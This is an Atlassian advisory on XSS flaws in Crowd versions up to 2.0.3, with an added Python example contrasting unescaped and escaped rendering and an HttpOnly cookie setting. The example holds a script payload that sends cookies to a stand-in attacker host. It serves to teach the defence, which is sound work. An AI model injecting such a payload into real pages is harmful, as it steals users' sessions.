This advisory announces a number of security vulnerabilities in earlier versions of Crowd that we have found and fixed in Crowd 2.0.4. In addition to releasing Crowd 2.0.4, we also provide point releases for earlier versions of Crowd to fix the vulnerabilities reported here.

XSS Vulnerabilities

Severity

Atlassian rates these vulnerabilities as high, according to the scale published in Severity Levels for Security Issues. The scale allows us to rank a vulnerability as critical, high, moderate or low.

Risk Assessment

We have identified and fixed a number of cross-site scripting (XSS) vulnerabilities which may affect Crowd instances in a public environment, that is, instances reachable by users you do not trust.

An attacker might take advantage of a vulnerability to steal other users' session cookies or other credentials, by causing the victim's browser to send those credentials to a web server the attacker controls.

An attacker's text and script might be displayed to other people viewing the Crowd page. This is potentially damaging to your company's reputation.

You can read more about XSS attacks at cgisecurity, CERT and other places on the web.
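The cookie-theft scenario described in the risk assessment, as an added example that is not part of this advisory and not Crowd's own code: a page that echoes a user-controlled value into HTML unencoded, beside the same page with HTML output encoding, a constructed payload of the kind an attacker would inject, and an HttpOnly session cookie as the defence-in-depth caveat. The hostname, function names and cookie name are assumptions made for illustration.

```python
import html
import re
from http.cookies import SimpleCookie

# Constructed payload (not from the advisory): once rendered into a page,
# the script ships document.cookie to a server the attacker controls.
# "attacker.example" is a placeholder hostname.
COOKIE_THEFT_PAYLOAD = (
    "<script>new Image().src="
    "'https://attacker.example/collect?c='+encodeURIComponent(document.cookie)"
    "</script>"
)


def render_vulnerable(display_name: str) -> str:
    """The XSS bug pattern: user-controlled text is placed into HTML unchanged."""
    return f"<html><body><h1>Welcome, {display_name}</h1></body></html>"


def render_fixed(display_name: str) -> str:
    """Same page with contextual output encoding.

    html.escape(quote=True) turns < > & " ' into entities, so the browser
    shows the payload as text instead of executing it.
    """
    return f"<html><body><h1>Welcome, {html.escape(display_name, quote=True)}</h1></body></html>"


SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def contains_active_script(rendered_html: str) -> bool:
    """Crude check used only to make the difference visible in this example.

    A real browser has many more script-bearing constructs (event handlers,
    javascript: URLs, ...), so this is not a substitute for output encoding.
    """
    return SCRIPT_TAG.search(rendered_html) is not None


def session_cookie_header(session_id: str) -> str:
    """Defence in depth: an HttpOnly cookie is not readable via document.cookie,
    so this particular exfiltration fails even if a script is injected.
    It does not remove the other impacts of XSS (defacement, actions in the
    victim's session), so it complements encoding rather than replacing it.
    Cookie name JSESSIONID is an assumption for the example.
    """
    jar = SimpleCookie()
    jar["JSESSIONID"] = session_id
    jar["JSESSIONID"]["httponly"] = True
    jar["JSESSIONID"]["secure"] = True
    jar["JSESSIONID"]["path"] = "/"
    return jar["JSESSIONID"].OutputString()


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(COOKIE_THEFT_PAYLOAD))
    print("fixed:     ", render_fixed(COOKIE_THEFT_PAYLOAD))
    print("Set-Cookie:", session_cookie_header("abc123"))
```

Run as a script, the vulnerable rendering contains the live `<script>` element while the fixed rendering contains only `&lt;script&gt;` text; the cookie header carries `HttpOnly` and `Secure`.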

Vulnerability

The table below lists the affected areas of Crowd. These XSS vulnerabilities exist in all versions of Crowd, up to and including Crowd 2.0.3.